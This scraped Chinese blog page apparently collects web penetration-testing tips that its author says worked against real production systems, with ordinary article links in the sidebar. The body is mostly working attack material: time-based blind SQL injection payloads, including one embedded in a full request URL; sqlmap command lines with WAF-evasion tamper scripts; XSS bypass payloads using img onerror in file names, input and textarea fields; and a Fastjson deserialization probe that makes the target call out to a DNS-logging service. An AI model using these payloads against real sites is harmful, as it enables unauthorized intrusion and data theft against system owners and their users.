当前位置:网站首页>web渗透经验汇总ing
web渗透经验汇总ing
2022-07-24 18:10:00 【haoaaao】
前言
//记录真实系统中成功过的小tips,毕竟靶场和生产环境相差还是很大的,**读万卷书不如行万里路**//
0x00、SQL
一次众测实战sql注入绕过 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现——ZAKER,个性化推荐热门新闻,本地权威媒体资讯
http://app.myzaker.com/news/article.php?pk=6035b5af8e9f09165c74a1ccmysql rlike concat_时间盲注子查询与rlike_丧心病狂刘老湿的博客-CSDN博客sql注入首先尝试单引号;当单引号不报错的时候,尝试宽字节注入%df'(--tamper=unmagicquotes)1、时间盲注子查询(SELECT(SLEEP(5)))jHpaPayload: id=1 AND 4301=BENCHMARK(5000000,MD5(0x67426a42))2、rlike报错当使用正则匹配时,使用REGEXP和NOTREGEXP操作符(或RLIKE和NOTR...https://blog.csdn.net/weixin_29611737/article/details/113910368
一、系统中成功过的那些闭合
️http://ip/api/user/query?atSchoolStatus=¤t_page=1&department=01'and(select*from(select+sleep(5))a+union+select+1)='&email=212&enabledStatus=&idCardNumber=&idCardType=
二、系统中成功过的那些sqlmap语句
//sql现在少的我都要怀疑我自己了
python sqlmap.py -r 1.txt --time-sec 8 --tamper=space2mysqlblank.py --batch --level 3 -p canshusqlmap -r xxx.txt --tamper=space2comment --level 3 --batch0x01、XSS
系统中那些成功过的绕过姿势
1、文件附件
//ps:前端验证
️<img src=x οnerrοr=confirm(1)>.jpg
2、input标签
️”><img src=1 οnerrοr=alert(1)>
3、textarea标签
️unicode编码绕过:
</textarea><img src="x" οnerrοr="alert("xss");">
️
绕过姿势汇总
0x02、反序列化
1、Fastjson
//发送数据包中发现fastjson框架,进行尝试。
步骤:
(1)去https://dig.pm/上申请dns。

(2)payload:{ {"@type":"java.net.URL","val":"http://dns"}:"summer"},替换payload里的dns,点击post发包。
(3)打开dig网站的“results”,有漏洞,results会有回显。
边栏推荐
- How to read "STL source code analysis"?
- pinia 入门及使用
- Still building projects from scratch? This upgraded rapid development scaffold is worth a try!
- [network security] analysis vulnerability of website Middleware
- 简单测试JS代码
- 数组扁平化.flat(Infinity)
- Emerging potential of interactive virtual reality technology in drug discovery
- Shardingsphere database read / write separation
- Dry goods | three sub domain name collection tools worth collecting
- Laravel笔记-用户登录时密码进行RSA加密(提高系统安全性)
猜你喜欢

Definition and storage of adjacency table and adjacency storage of directed graph and undirected graph

Pay close attention! List of the latest agenda of 2022 open atom open source Summit

0630~ professional quality course

Inherit, override, overload

Laravel笔记-用户登录时密码进行RSA加密(提高系统安全性)

生信常用分析图形绘制02 -- 解锁火山图真谛!
Go to bed capacity exchange

Get the data of Tongcheng (elong) Hotel

JumpServer的使用

0630~职业素养课
随机推荐
仅需一个依赖给Swagger换上新皮肤,既简单又炫酷!
Laravel笔记-用户登录时密码进行RSA加密(提高系统安全性)
Has polardb for PostgreSQL entered the list of Xinchuang database?
深入解析著名的阿里云Log4j 漏洞
0629~SaaS平台设计~全局异常处理
船新 IDEA 2022.2 正式发布,新特性真香!
阿里巴巴/1688按图搜索商品(拍立淘) API使用说明
Custom web framework
Alibaba 1688 keyword search product API usage display
(mandatory) override equals must override hashcode (principle analysis)
Three ways of redis cluster
Polymorphism, abstract class, interface
mac数据库管理软件Navicat Premium Essentials Mac
Awk from getting started to getting into the ground (19) awk extensions make awk even stronger
阿里巴巴1688按关键字搜索商品 API 使用展示
排序的几种方式for while 还有sort
【校验】只能输入数字(正负数)
0613 ~ self study
[OBS] cooperation between video and audio coding and RTMP transmission
Quickly complete the unit test junit4 setting of intelij idea